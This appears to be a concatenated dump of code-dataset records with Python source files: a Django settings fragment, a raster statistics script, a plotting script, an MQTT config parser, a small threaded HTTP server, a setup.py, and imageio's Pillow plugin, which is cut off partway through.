'level': 'DEBUG',\n 'propagate': True,\n },\n 'django.security.DisallowedHost': {\n 'handlers': ['null'],\n 'propagate': False,\n },\n }\n}\n\n\n# Django debug toolbar configuration\nif DEBUG_TOOLBAR:\n # Debugging toolbar middleware\n MIDDLEWARE_CLASSES += (\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n )\n # JavaScript panels for the deveopment debugging toolbar\n DEBUG_TOOLBAR_PANELS = (\n 'debug_toolbar.panels.versions.VersionsPanel',\n 'debug_toolbar.panels.timer.TimerPanel',\n 'debug_toolbar.panels.settings.SettingsPanel',\n 'debug_toolbar.panels.headers.HeadersPanel',\n 'debug_toolbar.panels.request.RequestPanel',\n 'debug_toolbar.panels.profiling.ProfilingPanel',\n 'debug_toolbar.panels.sql.SQLPanel',\n 'debug_toolbar.panels.staticfiles.StaticFilesPanel',\n 'debug_toolbar.panels.templates.TemplatesPanel',\n 'debug_toolbar.panels.cache.CachePanel',\n 'debug_toolbar.panels.signals.SignalsPanel',\n 'debug_toolbar.panels.logging.LoggingPanel',\n 
'debug_toolbar.panels.redirects.RedirectsPanel',\n )\n # Debug toolbar app\n INSTALLED_APPS += ('debug_toolbar',)\n CONFIG_DEFAULTS = {\n 'INTERCEPT_REDIRECTS': False,\n }\n","sub_path":"project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"65167974","text":"import rasterio ###critical to import rasterio first or the whole thing segfaults\nfrom rasterstats import raster_stats\nimport fiona\nimport sys\n#import os\nimport json\nimport numpy as np\n#import pandas as pd\n\n\n\nprint(\"hello\") \n#print(os.getcwd())\nshapefile = sys.argv[1]\nraster_file = sys.argv[2]\njson_output_file = sys.argv[3]\nstat_text = sys.argv[4]\nall_touched_param = False\nif len(sys.argv)>4:\n\tall_touched_param = True\n\nstat_array = stat_text.split(\",\")\n\n#shapefile = \"wi_005.shp\"\n#raster_file = \"cropscape.tif\"\nprint(shapefile)\nprint(raster_file)\nfull_lyr = fiona.open(shapefile)\nn = 100000\nall_stats = []\n\nfor i in range(0, len(full_lyr), n):\n\tlyr = full_lyr[i:i+n]\n\tfeatures = (x for x in lyr)\n\t#features = lyr[1]\n\n\t#can we subset in groups of 30k here?\n\n\tdef unique_values(x):\n\t\tvals = np.unique(x)\n\t\tvals = vals[~np.isnan(vals)]\n\t\t#x_arrstr = np.char.mod('%i', vals)\n\t\t#try just removing the .join below\n\t\t#x_str = \"|\".join(x_arrstr)\n\n\t\treturn(vals.tolist())\n\n\n\tdef unique_counts(x):\n\t\t#x = x[~pd.isnull(x)]\n\t\tunique, counts = np.unique(x, return_counts=True)\n\t\t#keep = np.isfinite(unique)\n\t\t#unique_list = unique.tolist()\n\t\t#unique_list = unique[unique != None].to_list()\n\t\treturn({'vals':unique.tolist(), 'counts':counts.tolist()})\n\n\n\t#keep_stats = raster_stats(features, raster_file,stats=['count'])\n\n\t#keep_stats = raster_stats(features, raster_file,stats=stat_array)\n\n\tif \"unique_values\" in stat_array:\n\t\tprint(\"here\")\n\t\tprint(stat_array)\n\t\tstat_array.remove(\"unique_values\")\n\t\tif(len(stat_array)<1):\n\t\t\tstat_array = [\"count\"]\n\t\n\t\tkeep_stats = raster_stats(features, raster_file,stats=stat_array,add_stats={'unique_values':unique_values},all_touched=all_touched_param)\n\telif \"unique_counts\" in stat_array:\n\t\tstat_array.remove(\"unique_counts\")\n\t\tif(len(stat_array)<1):\n\t\t\tstat_array = [\"count\"]\n\n\t\tkeep_stats = raster_stats(features, raster_file,stats=stat_array,add_stats={'unique_counts':unique_counts},all_touched=all_touched_param)\n\telse:\n\t\tkeep_stats = raster_stats(features, raster_file,stats=stat_array,all_touched=all_touched_param)\n\n\t#print(keep_stats[1])\t\n\t#to add your own statistics..\n\t#http://pythonhosted.org/rasterstats/manual.html#zonal-statistics\n\t#keep_stats = raster_stats(features, raster_file,stats=stat_array) #need this to LIST the unique values\n\n\n\t#with rasterio.open(\"nccpi.tif\") as src:\n\t# out_image, out_transform = mask(src, lyr[1], crop=True)\n \n\t#keep_stats = raster_stats(features, \"wut.tif\") #this kinda randomly produces..\n\n\t#TIFFReadDirectory: Warning, Unknown field with tag 42112 (0xa480) encountered.\n\t#TIFFReadDirectory: Warning, Unknown field with tag 42113 (0xa481) encountered.\n\t#Segmentation fault: 11\n\tall_stats.append(keep_stats)\n\n\n\nout_stats = [item for sublist in all_stats for item in sublist]\nwith open(json_output_file, 'w') as outfile:\n json.dump(out_stats, outfile)\n\n\n\n\n#this look really promising\n\n#below could give a bit more control, but need to test\n\n#import rasterio\n#from 
rasterio.mask import mask\n#import geopandas as gpd #should brew install geopandas?\n#shapefile = gpd.read_file(\"wi_005.shp\")\n# extract the geometry in GeoJSON format\n#geoms = shapefile.geometry.values # list of shapely geometries\n#geometry = geoms[0] # shapely geometry\n# transform to GeoJSON format\n#from shapely.geometry import mapping\n#geoms = [mapping(geoms[0])]\n# extract the raster values within the polygon\n#with rasterio.open(\"nccpi.tif\") as src:\n#    out_image, out_transform = mask(src, geoms, crop=True)","sub_path":"Function/Scripts/raster_extraction.py","file_name":"raster_extraction.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"57682305","text":"import os\nimport pandas as pd\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nimport matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport tensorflow as tf\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nff = plt.figure()\n\nMODEL = 'cnn'\n\n# result_dir = \"result\"\ndata_dir = \"data/OpenNRE\"\n\ndef PrecisionAtRecall(pAll, rAll, rMark):\n    length = len(rAll)\n    lo = 0\n    hi = length - 1\n    mark = length >> 1\n    error = rMark - rAll[mark]\n    while np.abs(error) > 0.005:\n        if error > 0:\n            hi = mark - 1\n        else:\n            lo = mark + 1\n        mark = (hi + lo) >> 1\n        error = rMark - rAll[mark]\n    return pAll[mark], rAll[mark], mark\n\nrel_map = {}\nwith open(os.path.join(data_dir, \"rel2id.txt\"), 'r') as f:\n    relations = f.readlines()\nfor index, rel in enumerate(relations):\n    rel_map[rel.strip()] = index\n\ncolor = ['red', 'turquoise', 'darkorange', 'cornflowerblue', 'teal']\n\ntest_model = ['cnn' + '+sen_att']\ntest_epoch = ['9']\navg_pres = []\nfor temp, (model, step) in enumerate(zip(test_model, test_epoch)):\n    y_scores = pd.read_csv(os.path.join(\"data/test_results.tsv\"), delimiter=\"\\t\", header=None).values\n    y_true_labels = pd.read_csv(\"data/OpenNRE/test.csv\", delimiter=\"\\t\", header=None)[3].values\n    y_true = []\n    for label in y_true_labels:\n        # collect the integer relation id for each gold label\n        y_true.append(rel_map[label.strip()])\n    # precision_recall_curve needs continuous scores, so the raw score matrix\n    # is kept as-is rather than being collapsed with np.argmax\n    y_true = tf.one_hot(y_true, len(rel_map))\n    y_scores = np.reshape(y_scores, (-1))\n    y_true = np.reshape(y_true, (-1))\n    precision, recall, threshold = precision_recall_curve(y_true, y_scores)\n    average_precision = average_precision_score(y_true, y_scores)\n    avg_pres.append(average_precision)\n    recall = recall[::-1]\n    precision = precision[::-1]\n    plt.plot(recall[:], precision[:], lw=2, color=color[1], label=\"baseline\")\n\n# lines_cnn = open('cnn.txt').readlines()\n# lines_cnn = [t.strip().split()[:2] for t in lines_cnn]\n# precision_cnn = np.array([t[0] for t in lines_cnn], dtype=np.float32)\n# recall_cnn = np.array([t[1] for t in lines_cnn], dtype=np.float32)\n# plt.plot(recall_cnn, precision_cnn, lw=2, color=color[-1], label=\"CNN+ATT\")\n#\n# plt.xlabel('Recall')\n# plt.ylabel('Precision')\n# plt.ylim([0.3, 1.0])\n# plt.xlim([0.0, 0.4])\n# plt.title('Precision-Recall Area={0:0.4f}'.format(avg_pres[-1]))\n# plt.legend(loc=\"upper right\")\n# plt.grid(True)\n# plt.savefig('sgd_' + MODEL)\n# plt.plot(range(10), range(10), \"o\")\n# plt.show()\n# ff.savefig(\"pr.pdf\", bbox_inches='tight')\n","sub_path":"draw_plot.py","file_name":"draw_plot.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"64742217","text":"import yaml\nimport logging\nimport logging.config\n\n\nclass Config:\n\t\"\"\"Class for parsing knx2mqtt.yaml.\"\"\"\n\t\n\tdef __init__(self, file='logging.conf'):\n\t\t\"\"\"Initialize Config class.\"\"\"\n\t\tlogging.debug(\"Reading %s\", file)\n\t\ttry:\n\t\t\twith open(file, 'r') as f:\n\t\t\t\tD = yaml.load(f, Loader=yaml.SafeLoader)\n\t\t\t\tD.setdefault('version', 1)\n\t\t\t\tlogging.config.dictConfig(D)\n\t\t\tself._mqtt = {}\n\t\t\tself._knx = {}\n\t\texcept FileNotFoundError as ex:\n\t\t\tlogging.error(\"Logging configuration file %s not found: %s\", file, ex)\n\t\t\texit(ex.errno)\n\t\n\t\n\tdef read(self, file='knx2mqtt.yaml'):\n\t\t\"\"\"Read config.\"\"\"\n\t\tlogging.debug(\"Reading %s\", file)\n\t\ttry:\n\t\t\twith open(file, 'r') as filehandle:\n\t\t\t\tconfig = yaml.load(filehandle, Loader=yaml.SafeLoader)\n\t\t\t\tself._parse_mqtt(config)\n\t\t\t\tself._parse_knx(config)\n\t\texcept FileNotFoundError as ex:\n\t\t\tlogging.error(\"Configuration file %s not found: %s\", file, ex)\n\t\t\texit(ex.errno)\n\n\n\tdef _parse_mqtt(self, config):\n\t\t\"\"\"Parse the mqtt section of knx2mqtt.yaml.\"\"\"\n\t\tif \"mqtt\" in config:\n\t\t\tself._mqtt = config[\"mqtt\"]\n\n\t\t\tif not \"client_id\" in self._mqtt:\n\t\t\t\tself._mqtt[\"client_id\"] = \"knx2mqtt\"\n\t\t\tif not \"host\" in self._mqtt:\n\t\t\t\traise ValueError(\"MQTT host not set\")\n\t\t\tif not \"port\" in self._mqtt:\n\t\t\t\tself._mqtt[\"port\"] = 1883\n\t\t\tif not \"user\" in self._mqtt:\n\t\t\t\tself._mqtt[\"user\"] = \"\"\n\t\t\tif not \"password\" in self._mqtt:\n\t\t\t\tself._mqtt[\"password\"] = \"\"\n\t\t\tif not \"topic\" in self._mqtt:\n\t\t\t\traise ValueError(\"MQTT topic not set\")\n\t\t\tif not \"qos\" in self._mqtt:\n\t\t\t\tself._mqtt[\"qos\"] = 0\n\t\t\tif not \"retain\" in self._mqtt:\n\t\t\t\tself._mqtt[\"retain\"] = False\n\t\t\tif not \"keepalive\" in self._mqtt:\n\t\t\t\tself._mqtt[\"keepalive\"] = 60\n\n\t\telse:\n\t\t\tlogging.error(\"MQTT configuration not found in configuration file.\")\n\t\t\texit(1)\n\n\n\tdef _parse_knx(self, config):\n\t\t\"\"\"Parse the knx section of knx2mqtt.yaml.\"\"\"\n\t\tif \"knx\" in config:\n\t\t\tself._knx = config[\"knx\"]\n\n\t\t\tif \"sensors\" in self._knx:\n\t\t\t\tfor item in self._knx[\"sensors\"]:\n\t\t\t\t\tif not \"address\" in item:\n\t\t\t\t\t\traise ValueError(\"Missing address for KNX sensor\")\n\t\t\telse:\n\t\t\t\tself._knx[\"sensors\"] = []\n\n\t\t\tif \"switches\" in self._knx:\n\t\t\t\tfor item in self._knx[\"switches\"]:\n\t\t\t\t\tif not \"address\" in item:\n\t\t\t\t\t\traise ValueError(\"Missing address for KNX switch\")\n\t\t\telse:\n\t\t\t\tself._knx[\"switches\"] = []\n\n\t\telse:\n\t\t\tlogging.error(\"KNX configuration not found in configuration file.\")\n\t\t\texit(1)\n\n\n\tdef mqtt(self):\n\t\treturn self._mqtt\n\n\tdef knx(self):\n\t\treturn self._knx\n","sub_path":"knx2mqtt/knx2mqtt/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"250443577","text":"# 4.22: Match on date format YYYY-MM-DD.\n\nimport runreport\n\nimport re\n\ndirlist = ('.', '..', '2010-12-15.txt', '2010-12-16.txt',\n           'testfile.txt', '20101-11-03.txt')\n\nfor item in dirlist:\n    if re.search(r'^\\d{4}-\\d{2}-\\d{2}\\.txt$', item):\n        print(item)\n\n
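# Note: re.search matches anywhere in the string, so the '^' anchor is what\n# rejects the five-digit year in '20101-11-03.txt'. An equivalent check:\n#   if re.fullmatch(r'\\d{4}-\\d{2}-\\d{2}\\.txt', item):\n#       print(item)\n\n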
# Expected Output:\n\n# 2010-12-15.txt\n# 2010-12-16.txt\n\n","sub_path":"session_04_working_files/inclass_exercises/inclass_4.22_lab.py","file_name":"inclass_4.22_lab.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"568994494","text":"from django.urls import include, path\r\nfrom . import views\r\n\r\n# Wire up our API using automatic URL routing.\r\n# Additionally, we include login URLs for the browsable API.\r\nurlpatterns = [\r\n    path('enviar_imagem/', views.ImagemUpload.as_view()),\r\n    path('registrar_ferramenta/', views.SalvaAnalisada.as_view()),\r\n    path('analisa_imagem/', views.AnalisaFerramenta.as_view()),\r\n    path('receber_numero/', views.NumeroProcesso.as_view()),\r\n    path('listar/<id_usuario>/', views.ListaRegistros.as_view())\r\n]\r\n","sub_path":"Back-End/APIs/projetoapi/APP/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"164580488","text":"\"\"\"\nModule implementing an HTTP server.\n\"\"\"\n\nfrom interfaces.threaded.i_server import IServer\nfrom base_errors.http_errors import HTTPError\nfrom email.parser import Parser\nfrom implementations.my_flask_thread.response import Response\nfrom implementations.my_flask_thread.request import Request\nfrom datetime import datetime\nimport threading\n\n\nclass HTTPServer(IServer):\n\n    _MAX_LINE = 64 * 1024  # HTTP does not require limiting the request-line length,\n    # but servers usually do\n    _MAX_HEADERS = 100  # likewise, HTTP itself does not cap the number of headers, but servers usually do\n\n    def __init__(self, host_name, port_id, server_name, request, response):\n        super().__init__(host_name, port_id, server_name, request, response)\n\n    def _parse_request(self, conn):\n        \"\"\"\n        Parse a client request.\n        :param conn: socket\n        :return: request object\n        \"\"\"\n\n        _rfile = conn.makefile('rb')\n        method, target, ver = self._parse_request_line(_rfile)\n        headers = self._parse_headers(_rfile)\n        host = headers.get('Host')\n        if not host:\n            raise Exception('Bad request')\n        if host not in (self.server_name, f'{self.server_name}:{self.port}'):\n            raise HTTPError(404, 'Not found')\n        _request = Request()\n        _request.set_data(method, target, ver, headers, _rfile)\n        return _request\n\n    def _parse_request_line(self, conn):\n        \"\"\"\n        Parse the request line.\n        :conn: socket connection\n        :return: request method, request target, protocol version\n        \"\"\"\n        raw = conn.readline(HTTPServer._MAX_LINE + 1)\n\n        if len(raw) > HTTPServer._MAX_LINE:\n            raise Exception('Request line is too long')\n\n        req_line = str(raw, 'iso-8859-1')\n        req_line = req_line.rstrip('\\r\\n')\n        params = req_line.split()\n\n        if len(params) != 3:\n            raise Exception('Incorrect request line')\n\n        method, target, ver = params\n\n        # only HTTP version 1.1 is supported\n        if ver != 'HTTP/1.1':\n            raise Exception('Unexpected HTTP version')\n\n        return method, target, ver\n\n    def _parse_headers(self, conn):\n        \"\"\"\n        Parse the headers.\n        :conn: socket connection\n        :return: object containing the headers\n        \"\"\"\n        headers = []\n        while True:\n            line = conn.readline(HTTPServer._MAX_LINE + 1)\n            if len(line) > HTTPServer._MAX_LINE:\n                raise Exception('Header line is too long')\n\n            # check for the end of the header block\n            if line in (b'\\r\\n', b'\\n', b''):\n                break\n\n            headers.append(line)\n            if len(headers) > HTTPServer._MAX_HEADERS:\n                raise Exception('Too many headers')\n\n
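        # The raw header lines are joined and handed to email.parser.Parser,\n        # which returns a dict-like Message object (callers can then use\n        # headers.get('Host') and friends).\n        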
str_headers = b''.join(headers).decode('iso-8859-1')\n        return Parser().parsestr(str_headers)\n\n    def _handle_request(self, request):\n        \"\"\"\n        Handle a client request.\n        This method provides default behaviour that should be overridden with business logic.\n        :request: request object\n        :return: data for the client\n        \"\"\"\n        response = Response()\n        response.set_data(200, 'OK')\n        return response\n\n    def _send_response(self, conn, response):\n        \"\"\"\n        Send a response to the client.\n        :param conn: socket\n        :param response: response object\n        \"\"\"\n\n        wfile = conn.makefile('wb')\n        status_line = f'HTTP/1.1 {response.status} {response.reason}\\r\\n'\n\n        wfile.write(status_line.encode('iso-8859-1'))\n\n        if response.headers:\n            for (key, value) in response.headers:\n                header_line = f'{key}: {value}\\r\\n'\n                wfile.write(header_line.encode('iso-8859-1'))\n\n        wfile.write(b'\\r\\n')\n\n        if response.body:\n            wfile.write(response.body)\n\n        wfile.flush()\n        wfile.close()\n\n    def _send_error(self, conn, err):\n        \"\"\"\n        Build an error object and send it.\n        :param conn: socket\n        :param err: the error\n        \"\"\"\n        try:\n            status = err.status\n            reason = err.reason\n            body = (err.body or err.reason).encode('utf-8')\n        except AttributeError:\n            status = 500\n            reason = 'Internal Server Error'\n            body = b'Internal Server Error'\n        response = Response()\n        response.set_data(status, reason, [('Content-Length', len(body))], body)\n        self._send_response(conn, response)\n","sub_path":"implementations/my_flask_thread/http_server/http_server.py","file_name":"http_server.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"35626815","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\ninstall_requirements = [\n    'sqlalchemy',\n    'numpy',\n    'textblob',\n    'vaderSentiment',\n    'pandas',\n    'newsapi-python',\n    'python-dateutil',\n    'requests',\n    'bs4',\n    'scrapy',\n    'python-dotenv',\n]\n\nsetuptools.setup(\n    name=\"senti-news\",\n    version=\"0.0.38\",\n    author=\"Nicholas Broad\",\n    author_email=\"nicholas@nmbroad.com\",\n    description=\"News title sentiment analysis\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/nbroad1881/senti-news\",\n    packages=setuptools.find_packages(where='src/'),\n    package_dir={'': 'src'},\n    install_requires=install_requirements,\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    python_requires='>=3.6',\n)\n","sub_path":"senti-news/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"221025827","text":"# -*- coding: utf-8 -*-\n# imageio is distributed under the terms of the (new) BSD License.\n\n\"\"\" Read/Write images using Pillow/PIL.\n\nBackend Library: `Pillow <https://pillow.readthedocs.io/en/stable/>`_\n\nPlugin that wraps the Pillow library. Pillow is a friendly fork of PIL\n(Python Image Library) and supports reading and writing of common formats (jpg,\npng, gif, tiff, ...). For the complete list of features and supported formats\nplease refer to Pillow's official docs (see the Backend Library link).\n\nParameters\n----------\nrequest : Request\n    A request object representing the resource to be operated on.\n\nMethods\n-------\n\n.. 
autosummary::\n :toctree: _plugins/pillow\n\n PillowPlugin.read\n PillowPlugin.write\n PillowPlugin.iter\n PillowPlugin.get_meta\n\n\"\"\"\n\nfrom io import BytesIO\nfrom typing import Callable, Optional, Dict, Any, Tuple, cast, Iterator, Union, List\nimport numpy as np\nfrom PIL import Image, UnidentifiedImageError, ImageSequence, ExifTags # type: ignore\nfrom ..core.request import Request, IOMode, InitializationError, URI_BYTES\nfrom ..core.v3_plugin_api import PluginV3, ImageProperties\nimport warnings\nfrom ..typing import ArrayLike\n\n\ndef _exif_orientation_transform(orientation: int, mode: str) -> Callable:\n # get transformation that transforms an image from a\n # given EXIF orientation into the standard orientation\n\n # -1 if the mode has color channel, 0 otherwise\n axis = -2 if Image.getmodebands(mode) > 1 else -1\n\n EXIF_ORIENTATION = {\n 1: lambda x: x,\n 2: lambda x: np.flip(x, axis=axis),\n 3: lambda x: np.rot90(x, k=2),\n 4: lambda x: np.flip(x, axis=axis - 1),\n 5: lambda x: np.flip(np.rot90(x, k=3), axis=axis),\n 6: lambda x: np.rot90(x, k=1),\n 7: lambda x: np.flip(np.rot90(x, k=1), axis=axis),\n 8: lambda x: np.rot90(x, k=3),\n }\n\n return EXIF_ORIENTATION[orientation]\n\n\nclass PillowPlugin(PluginV3):\n def __init__(self, request: Request) -> None:\n \"\"\"Instantiate a new Pillow Plugin Object\n\n Parameters\n ----------\n request : {Request}\n A request object representing the resource to be operated on.\n\n \"\"\"\n\n super().__init__(request)\n\n self._image: Image = None\n\n if request.mode.io_mode == IOMode.read:\n try:\n with Image.open(request.get_file()):\n # Check if it is generally possible to read the image.\n # This will not read any data and merely try to find a\n # compatible pillow plugin (ref: the pillow docs).\n pass\n except UnidentifiedImageError:\n if request._uri_type == URI_BYTES:\n raise InitializationError(\n \"Pillow can not read the provided bytes.\"\n ) from None\n else:\n raise InitializationError(\n f\"Pillow can not read {request.raw_uri}.\"\n ) from None\n\n self._image = Image.open(self._request.get_file())\n else:\n extension = self.request.extension or self.request.format_hint\n if extension is None:\n warnings.warn(\n \"Can't determine file format to write as. You _must_\"\n \" set `format` during write or the call will fail. Use \"\n \"`extension` to supress this warning. \",\n UserWarning,\n )\n return\n\n tirage = [Image.preinit, Image.init]\n for format_loader in tirage:\n format_loader()\n if extension in Image.registered_extensions().keys():\n return\n\n raise InitializationError(\n f\"Pillow can not write `{extension}` files.\"\n ) from None\n\n def close(self) -> None:\n if self._image:\n self._image.close()\n\n self._request.finish()\n\n def read(\n self, *, index=None, mode=None, rotate=False, apply_gamma=False, as_gray=None\n ) -> np.ndarray:\n \"\"\"\n Parses the given URI and creates a ndarray from it.\n\n Parameters\n ----------\n index : int\n If the ImageResource contains multiple ndimages, and index is an\n integer, select the index-th ndimage from among them and return it.\n If index is an ellipsis (...), read all ndimages in the file and\n stack them along a new batch dimension and return them. If index is\n None, this plugin reads the first image of the file (index=0) unless\n the image is a GIF or APNG, in which case all images are read\n (index=...).\n mode : str\n Convert the image to the given mode before returning it. If None,\n the mode will be left unchanged. 
Possible modes can be found at:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html#modes\n rotate : bool\n If set to ``True`` and the image contains an EXIF orientation tag,\n apply the orientation before returning the ndimage.\n apply_gamma : bool\n If ``True`` and the image contains metadata about gamma, apply gamma\n correction to the image.\n as_gray : bool\n Deprecated. Exists to raise a constructive error message.\n\n Returns\n -------\n ndimage : ndarray\n A numpy array containing the loaded image data\n\n Notes\n -----\n If you open a GIF - or any other format using color pallets - you may\n wish to manually set the `mode` parameter. Otherwise, the numbers in\n the returned image will refer to the entries in the color pallet, which\n is discarded during conversion to ndarray.\n\n \"\"\"\n\n if as_gray is not None:\n raise TypeError(\n \"The keyword `as_gray` is no longer supported.\"\n \"Use `mode='L'` instead.\"\n )\n\n if index is None:\n if self._image.format == \"GIF\":\n index = Ellipsis\n elif self._image.custom_mimetype == \"image/apng\":\n index = Ellipsis\n else:\n index = 0\n\n if isinstance(index, int):\n # will raise IO error if index >= number of frames in image\n self._image.seek(index)\n image = self._apply_transforms(self._image, mode, rotate, apply_gamma)\n return image\n else:\n iterator = self.iter(mode=mode, rotate=rotate, apply_gamma=apply_gamma)\n image = np.stack([im for im in iterator], axis=0)\n return image\n\n def iter(\n self, *, mode: str = None, rotate: bool = False, apply_gamma: bool = False\n ) -> Iterator[np.ndarray]:\n \"\"\"\n Iterate over all ndimages/frames in the URI\n\n Parameters\n ----------\n mode : {str, None}\n Convert the image to the given mode before returning it. If None,\n the mode will be left unchanged. Possible modes can be found at:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html#modes\n rotate : {bool}\n If set to ``True`` and the image contains an EXIF orientation tag,\n apply the orientation before returning the ndimage.\n apply_gamma : {bool}\n If ``True`` and the image contains metadata about gamma, apply gamma\n correction to the image.\n \"\"\"\n\n for im in ImageSequence.Iterator(self._image):\n yield self._apply_transforms(im, mode, rotate, apply_gamma)\n\n def _apply_transforms(self, image, mode, rotate, apply_gamma) -> np.ndarray:\n if mode is not None:\n image = image.convert(mode)\n elif image.format == \"GIF\":\n # adjust for pillow9 changes\n # see: https://github.com/python-pillow/Pillow/issues/5929\n image = image.convert(image.palette.mode)\n image = np.asarray(image)\n\n meta = self.metadata(index=self._image.tell(), exclude_applied=False)\n if rotate and \"Orientation\" in meta:\n transformation = _exif_orientation_transform(\n meta[\"Orientation\"], self._image.mode\n )\n image = transformation(image)\n\n if apply_gamma and \"gamma\" in meta:\n gamma = float(meta[\"gamma\"])\n scale = float(65536 if image.dtype == np.uint16 else 255)\n gain = 1.0\n image = ((image / scale) ** gamma) * scale * gain + 0.4999\n image = np.round(image).astype(np.uint8)\n\n return image\n\n def write(\n self,\n ndimage: Union[ArrayLike, List[ArrayLike]],\n *,\n mode: str = None,\n format: str = None,\n is_batch: bool = None,\n **kwargs,\n ) -> Optional[bytes]:\n \"\"\"\n Write an ndimage to the URI specified in path.\n\n If the URI points to a file on the current host and the file does not\n yet exist it will be created. 
If the file exists already, it will be\n appended if possible; otherwise, it will be replaced.\n\n If necessary, the image is broken down along the leading dimension to\n fit into individual frames of the chosen format. If the format doesn't\n support multiple frames, and IOError is raised.\n\n Parameters\n ----------\n image : ndarray or list\n The ndimage to write. If a list is given each element is expected to\n be an ndimage.\n mode : str\n Specify the image's color format. If None (default), the mode is\n inferred from the array's shape and dtype. Possible modes can be\n found at:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html#modes\n format : str\n Optional format override. If omitted, the format to use is\n determined from the filename extension. If a file object was used\n instead of a filename, this parameter must always be used.\n is_batch : bool\n Explicitly tell the writer that ``image`` is a batch of images\n (True) or not (False). If None, the writer will guess this from the\n provided ``mode`` or ``image.shape``. While the latter often works,\n it may cause problems for small images due to aliasing of spatial\n and color-channel axes.\n kwargs : ...\n Extra arguments to pass to pillow. If a writer doesn't recognise an\n option, it is silently ignored. The available options are described\n in pillow's `image format documentation\n <https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html>`_\n for each writer.\n\n Notes\n -----\n When writing batches of very narrow (2-4 pixels wide) gray images set\n the ``mode`` explicitly to avoid the batch being identified as a colored\n image.\n\n \"\"\"\n if \"fps\" in kwargs:\n raise TypeError(\n \"The keyword `fps` is no longer supported. Use `duration`\"\n \"(in ms) instead, e.g. `fps=50` == `duration=20` (1000 * 1/50).\"\n )\n\n extension = self.request.extension or self.request.format_hint\n\n save_args = {\n \"format\": format or Image.registered_extensions()[extension],\n }\n\n if isinstance(ndimage, list):\n ndimage = np.stack(ndimage, axis=0)\n is_batch = True\n else:\n ndimage = np.asarray(ndimage)\n\n # check if ndimage is a batch of frames/pages (e.g. 
for writing GIF)\n # if mode is given, use it; otherwise fall back to image.ndim only\n if is_batch is not None:\n pass\n elif mode is not None:\n is_batch = (\n ndimage.ndim > 3 if Image.getmodebands(mode) > 1 else ndimage.ndim > 2\n )\n elif ndimage.ndim == 2:\n is_batch = False\n elif ndimage.ndim == 3 and ndimage.shape[-1] == 1:\n raise ValueError(\"Can't write images with one color channel.\")\n elif ndimage.ndim == 3 and ndimage.shape[-1] in [2, 3, 4]:\n # Note: this makes a channel-last assumption\n is_batch = False\n else:\n is_batch = True\n\n if not is_batch:\n ndimage = ndimage[None, ...]\n\n pil_frames = list()\n for frame in ndimage:\n pil_frame = Image.fromarray(frame, mode=mode)\n if \"bits\" in kwargs:\n pil_frame = pil_frame.quantize(colors=2 ** kwargs[\"bits\"])\n pil_frames.append(pil_frame)\n primary_image, other_images = pil_frames[0], pil_frames[1:]\n\n if is_batch:\n save_args[\"save_all\"] = True\n save_args[\"append_images\"] = other_images\n\n save_args.update(kwargs)\n primary_image.save(self._request.get_file(), **save_args)\n\n if self._request._uri_type == URI_BYTES:\n file = cast(BytesIO, self._request.get_file())\n return file.getvalue()\n\n return None\n\n def get_meta(self, *, index=0) -> Dict[str, Any]:\n return self.metadata(index=index, exclude_applied=False)\n\n def metadata(\n self, index: int = None, exclude_applied: bool = True\n ) -> Dict[str, Any]:\n \"\"\"Read ndimage metadata.\n\n Parameters\n ----------\n index : {integer, None}\n If the ImageResource contains multiple ndimages, and index is an\n integer, select the index-th ndimage from among them and return its\n metadata. If index is an ellipsis (...), read and return global\n metadata. If index is None, this plugin reads metadata from the\n first image of the file (index=0) unless the image is a GIF or APNG,\n in which case global metadata is read (index=...).\n\n Returns\n -------\n metadata : dict\n A dictionary of format-specific metadata.\n\n \"\"\"\n\n if index is None:\n if self._image.format == \"GIF\":\n index = Ellipsis\n elif self._image.custom_mimetype == \"image/apng\":\n index = Ellipsis\n else:\n index = 0\n\n if isinstance(index, int) and self._image.tell() != index:\n self._image.seek(index)\n\n metadata = self._image.info.copy()\n metadata[\"mode\"] = self._image.mode\n metadata[\"shape\"] = self._image.size\n\n if self._image.mode == \"P\":\n metadata[\"palette\"] = self._image.palette\n\n if self._image.getexif():\n exif_data = {\n ExifTags.TAGS.get(key, \"unknown\"): value\n for key, value in dict(self._image.getexif()).items()\n }\n exif_data.pop(\"unknown\", None)\n metadata.update(exif_data)\n\n if exclude_applied:\n metadata.pop(\"Orientation\", None)\n\n return metadata\n\n def properties(self, index: int = None) -> ImageProperties:\n \"\"\"Standardized ndimage metadata\n Parameters\n ----------\n index : int\n If the ImageResource contains multiple ndimages, and index is an\n integer, select the index-th ndimage from among them and return its\n properties. If index is an ellipsis (...), read and return the\n properties of all ndimages in the file stacked along a new 